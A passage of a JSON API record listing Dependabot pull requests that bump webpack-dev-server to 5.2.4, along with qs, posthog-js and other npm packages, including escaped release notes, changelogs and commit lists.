href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n","html_url":"https://github.com/bameyrick/animated-weather-icon/pull/81","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/bameyrick%2Fanimated-weather-icon/issues/81","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/81/packages"}},{"old_version":"5.2.3","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-26T16:51:36.000Z","version_change":"5.2.3 → 5.2.4","issue":{"uuid":"4525930010","node_id":"PR_kwDORPhVPc7ffyuh","number":147,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 2 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-27T05:41:41.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-26T16:51:36.000Z","updated_at":"2026-05-27T05:41:50.000Z","time_to_close":46205,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":2,"packages":[{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"qs","old_version":"6.15.0","new_version":"6.15.2","repository_url":"https://github.com/ljharb/qs"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 1 update in the / directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /shared/demo-server directory: [qs](https://github.com/ljharb/qs).\n\nUpdates `webpack-dev-server` from 5.2.3 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.15.0 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.15.0...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/ptarmiganlabs/help-button.qs/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/ptarmiganlabs/help-button.qs/pull/147","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/ptarmiganlabs%2Fhelp-button.qs/issues/147","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/147/packages"}},{"old_version":"5.2.3","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-26T02:20:56.000Z","version_change":"5.2.3 → 5.2.4","issue":{"uuid":"4520807233","node_id":"PR_kwDOPL5Du87fPEmI","number":23,"state":"open","title":"chore(deps): bump the patches group with 8 updates","user":"dependabot[bot]","labels":["dependencies"],"assignees":[],"locked":false,"comments_count":4,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-26T02:20:56.000Z","updated_at":"2026-05-26T02:21:27.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"patches","update_count":8,"packages":[{"name":"posthog-js","old_version":"1.369.3","new_version":"1.376.0","repository_url":"https://github.com/PostHog/posthog-js"},{"name":"webpack","old_version":"5.105.4","new_version":"5.107.2","repository_url":"https://github.com/webpack/webpack"},{"name":"webpack-dev-server","old_version":"5.2.3","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"@babel/core","old_version":"7.29.0","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@babel/preset-env","old_version":"7.29.2","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"@biomejs/biome","old_version":"2.4.9","new_version":"2.4.15","repository_url":"https://github.com/biomejs/biome"},{"name":"jsdom","old_version":"29.0.1","new_version":"29.1.1","repository_url":"https://github.com/jsdom/jsdom"},{"name":"vite","old_version":"8.0.8","new_version":"8.0.14","repository_url":"https://github.com/vitejs/vite"}],"path":null,"ecosystem":"npm"},"body":"Bumps the patches group with 8 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [posthog-js](https://github.com/PostHog/posthog-js) | `1.369.3` | `1.376.0` |\n| [webpack](https://github.com/webpack/webpack) | `5.105.4` | `5.107.2` |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.3` | `5.2.4` |\n| [@babel/core](https://github.com/babel/babel/tree/HEAD/packages/babel-core) | `7.29.0` | `7.29.7` |\n| [@babel/preset-env](https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env) | `7.29.2` | `7.29.7` |\n| [@biomejs/biome](https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome) | `2.4.9` | `2.4.15` |\n| [jsdom](https://github.com/jsdom/jsdom) | `29.0.1` | `29.1.1` |\n| [vite](https://github.com/vitejs/vite/tree/HEAD/packages/vite) | `8.0.8` | `8.0.14` |\n\nUpdates `posthog-js` from 1.369.3 to 1.376.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/PostHog/posthog-js/releases\"\u003eposthog-js's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eposthog-js@1.376.0\u003c/h2\u003e\n\u003ch2\u003e1.376.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3655\"\u003e#3655\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/6e8d3495d0a29076aeea5220e19e646aeb7f063f\"\u003e\u003ccode\u003e6e8d349\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/arnaudhillen\"\u003e\u003ccode\u003e@​arnaudhillen\u003c/code\u003e\u003c/a\u003e! - Expose the in-repo \u003ccode\u003e@posthog/rrweb\u003c/code\u003e, \u003ccode\u003e@posthog/rrweb-types\u003c/code\u003e, and \u003ccode\u003e@posthog/rrweb-plugin-console-record\u003c/code\u003e packages as subpath entry points on \u003ccode\u003eposthog-js\u003c/code\u003e. Consumers can now \u003ccode\u003eimport { Replayer } from 'posthog-js/rrweb'\u003c/code\u003e, \u003ccode\u003eimport type { eventWithTime } from 'posthog-js/rrweb-types'\u003c/code\u003e, and \u003ccode\u003eimport { LogLevel } from 'posthog-js/rrweb-plugin-console-record'\u003c/code\u003e instead of installing the underlying rrweb packages directly. The rrweb worker sourcemap (\u003ccode\u003eimage-bitmap-data-url-worker-*.js.map\u003c/code\u003e) is also shipped from \u003ccode\u003eposthog-js/dist/\u003c/code\u003e so downstream bundlers no longer need to reach into \u003ccode\u003enode_modules/@posthog/rrweb\u003c/code\u003e.\n(2026-05-22)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/pull/3639\"\u003e#3639\u003c/a\u003e \u003ca href=\"https://github.com/PostHog/posthog-js/commit/c806ccafdcc39b38e9554f8a17a8c2fbd3361dda\"\u003e\u003ccode\u003ec806cca\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/marandaneto\"\u003e\u003ccode\u003e@​marandaneto\u003c/code\u003e\u003c/a\u003e! - Use native async gzip compression for session recording events when CompressionStream is available.\n(2026-05-22)\u003c/li\u003e\n\u003cli\u003eUpdated dependencies [\u003ca href=\"https://github.com/PostHog/posthog-js/commit/c806ccafdcc39b38e9554f8a17a8c2fbd3361dda\"\u003e\u003ccode\u003ec806cca\u003c/code\u003e\u003c/a\u003e]:\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/core\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.29.9\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/types\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.376.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eposthog-js@1.375.0\u003c/h2\u003e\n\u003ch2\u003e1.375.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca 